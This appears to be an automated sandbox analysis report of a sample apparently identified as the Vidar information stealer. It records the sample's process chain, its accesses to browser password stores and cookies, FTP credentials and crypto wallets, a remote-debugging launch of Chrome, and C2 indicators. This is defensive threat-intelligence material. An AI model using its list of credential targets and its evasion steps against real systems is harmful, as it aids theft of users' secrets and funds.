    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "closingscriptsbeachescomplicated" Corners Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Virtue + ..\Economies + ..\Downloading + ..\Gets + ..\Month + ..\Command + ..\Mean + ..\Violin + ..\Original IJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com Verzeichnis.com IJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: Verzeichnis.com, 0000000B.00000000.2130275245.0000000000556000.00000002.00000001.01000000.00000006.sdmp, Verzeichnis.com.2.dr, Corners.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ton.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

    Remote Access Functionality

    barindex
    Source: C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    112
    Process Injection
    111
    Masquerading
    2
    OS Credential Dumping
    1
    Query Registry
    Remote Services11
    Input Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Virtualization/Sandbox Evasion
    11
    Input Capture
    1
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Remote Access Software
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection
    112
    Process Injection
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares3
    Data from Local System
    1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    Process Discovery
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets3
    File and Directory Discovery
    SSHKeylogging4
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials15
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Extra Window Memory Injection
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567951 Sample: ton.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 59 kresk.lol 2->59 61 t.me 2->61 63 YNwKHeEoflVmSgaTq.YNwKHeEoflVmSgaTq 2->63 83 Suricata IDS alerts for network traffic 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 Yara detected Vidar stealer 2->87 89 2 other signatures 2->89 10 ton.exe 25 2->10         started        12 msedge.exe 2->12         started        signatures3 process4 signatures5 15 cmd.exe 3 10->15         started        93 Maps a DLL or memory area into another process 12->93 19 msedge.exe 12->19         started        22 identity_helper.exe 12->22         started        24 identity_helper.exe 12->24         started        26 2 other processes 12->26 process6 dnsIp7 55 C:\Users\user\AppData\...\Verzeichnis.com, PE32 15->55 dropped 81 Drops PE files with a suspicious file extension 15->81 28 Verzeichnis.com 29 15->28         started        32 cmd.exe 2 15->32         started        34 conhost.exe 15->34         started        36 7 other processes 15->36 65 18.164.116.57, 443, 50093, 50104 MIT-GATEWAYSUS United States 19->65 67 sb.scorecardresearch.com 18.165.220.106, 443, 50043 MIT-GATEWAYSUS United States 19->67 69 23 other IPs or domains 19->69 file8 signatures9 process10 dnsIp11 75 kresk.lol 159.69.102.165, 443, 49924, 49930 HETZNER-ASDE Germany 28->75 77 t.me 149.154.167.99, 443, 49919 TELEGRAMRU United Kingdom 28->77 79 127.0.0.1 unknown unknown 28->79 95 Attempt to bypass Chrome Application-Bound Encryption 28->95 97 Tries to harvest and steal ftp login credentials 28->97 99 Tries to harvest and steal browser information (history, passwords, etc) 28->99 101 Tries to steal Crypto Currency Wallets 28->101 38 msedge.exe 2 10 28->38         started        41 chrome.exe 28->41         started        44 cmd.exe 28->44         started        signatures12 process13 dnsIp14 91 Monitors registry run keys for changes 38->91 46 msedge.exe 38->46         started        71 192.168.2.6, 443, 49198, 49320 unknown unknown 41->71 73 239.255.255.250 unknown Reserved 41->73 48 chrome.exe 41->48         started        51 conhost.exe 44->51         started        53 timeout.exe 44->53         started        signatures15 process16 dnsIp17 57 www.google.com 142.250.181.68, 443, 49968, 49971 GOOGLEUS United States 48->57

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ton.exe16%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    chrome.cloudflare-dns.com
    162.159.61.3
    truefalse
      high
      t.me
      149.154.167.99
      truefalse
        high
        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
        94.245.104.56
        truefalse
          high
          sb.scorecardresearch.com
          18.165.220.106
          truefalse
            high
            www.google.com
            142.250.181.68
            truefalse
              high
              kresk.lol
              159.69.102.165
              truetrue
                unknown
                googlehosted.l.googleusercontent.com
                142.250.181.65
                truefalse
                  high
                  clients2.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    bzib.nelreports.net
                    unknown
                    unknownfalse
                      high
                      assets.msn.com
                      unknown
                      unknownfalse
                        high
                        c.msn.com
                        unknown
                        unknownfalse
                          high
                          YNwKHeEoflVmSgaTq.YNwKHeEoflVmSgaTq
                          unknown
                          unknownfalse
                            unknown
                            ntp.msn.com
                            unknown
                            unknownfalse
                              high
                              api.msn.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://sb.scorecardresearch.com/b?rn=1733274145725&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D5C2060AD936F240B4A352BAC196EE0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                  high
                                  https://c.msn.com/c.gif?rnd=1733274145724&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=079e86c896ad4d31a1c2b187d398af48&activityId=079e86c896ad4d31a1c2b187d398af48&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                    high
                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733274145722&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabQ16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drfalse
                                        high
                                        https://google-ohttp-relay-join.fastly-edge.com/(jchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drfalse
                                            high
                                            https://google-ohttp-relay-join.fastly-edge.com/jnchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://google-ohttp-relay-join.fastly-edge.com/Inchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000013.00000003.3563696313.000027F002480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ntp.msn.com/_defaultQuotaManager.21.drfalse
                                                    high
                                                    http://anglebug.com/4633chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://anglebug.com/7382chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://issuetracker.google.com/284462263msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://google-ohttp-relay-join.fastly-edge.com/9jchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.21.drfalse
                                                              high
                                                              https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.21.drfalse
                                                                high
                                                                https://deff.nelreports.net/api/reportReporting and NEL.22.drfalse
                                                                  high
                                                                  https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://polymer.github.io/AUTHORS.txtchrome.exe, 00000010.00000003.3420996184.00004EB4010F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420962492.00004EB4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422808984.00004EB40100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420843802.00004EB400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422749770.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422718552.00004EB4009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421086345.00004EB4010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3421026227.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3422685338.00004EB400478000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://docs.google.com/manifest.json0.21.drfalse
                                                                        high
                                                                        https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.youtube.com6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                            high
                                                                            https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.22.drfalse
                                                                              high
                                                                              https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000010.00000003.3420458404.00004EB40103C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://anglebug.com/7714chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.instagram.com6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                    high
                                                                                    https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000010.00000003.3423220925.00004EB40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423082645.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://anglebug.com/6248chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                            high
                                                                                            https://outlook.office.com/mail/compose?isExtension=true6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drfalse
                                                                                              high
                                                                                              http://anglebug.com/6929chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://google-ohttp-relay-join.fastly-edge.com/8mchrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
